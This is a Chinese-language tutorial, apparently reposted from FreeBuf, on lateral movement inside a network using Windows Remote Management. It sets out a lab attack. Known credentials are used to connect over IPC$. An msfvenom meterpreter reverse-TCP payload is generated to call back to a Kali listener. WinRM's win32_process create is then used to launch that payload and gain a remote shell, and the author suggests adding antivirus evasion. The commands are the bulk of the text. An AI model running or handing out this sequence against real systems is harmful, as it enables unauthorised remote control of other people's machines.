利用WinRM实现内网无文件攻击反弹shell

利用WinRM实现内网无文件攻击反弹shell

原文转自：https://www.freebuf.com/column/212749.html

前言

WinRM是Windows Remote Managementd（win远程管理）的简称。基于Web服务管理(WS-Management)标准，使用80端口或者443端口。这样一来，我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。

Server2008R2及往上的系统中默认中都开启该服务，从Server2012系统后开始，该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务，但是默认为禁用状态，Win8系统和Win10系统也都默认开启WinRM服务。

WinRM的好处在于，这种远程连接不容易被察觉到，也不会占用远程连接数！

环境准备

WinRM会用到5985、5986 端口，所以防火墙必须做开放处理。

用Administrator（管理员）账户登录攻击机器

前提知道被攻击方的用户登录账户密码

Windows操作系统中，默认是开启共享IPC$的

内网IP:192.168.10.1(win10)

被攻击机IP:192.168.10.130(win7)

攻击机IP:192.168.10.149(Kali)

攻击过程

一、快速在(win10)运行winrm

命令：winrm quickconfig

注：Win10是默认开启winrm，win7不是默认的。开启winrm service服务链接：https://jingyan.baidu.com/article/9158e0006b27dfa254122813.html

二、net use连接(win7)

命令：net use \\192.168.10.130\ipc$ “密码” /user:“用户名” （命令不唯一）

四、在（win7）中放置木马，并且用（kali）接收反弹的shell 生成shellcode

命令：msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.10.149 lport=7777 -f exe -o ./xxx.exe

把”xxx.exe”放在(win7)的C盘根目录.

kali启动监听shell模式

利用(win10）的WinRM 实现内网无文件攻击反弹shell,在（win10）中执行以下命令

Winrm invoke create wmicimv2/win32_process @{commandline=”\\192.168.10.130\c\xxx.exe”}

反弹成功

总结和反思

shellcode还可以做一些免杀处理，使其更加的完美。（有待大佬们再次总结）

winrm service 服务配置要正确

ipc共享的时候命令不唯一，看准空格很重要，连接状态有时候自己断开（我还没找到原因，请教大佬），需要重新连接。

用win2008没成功，可能虚拟机问题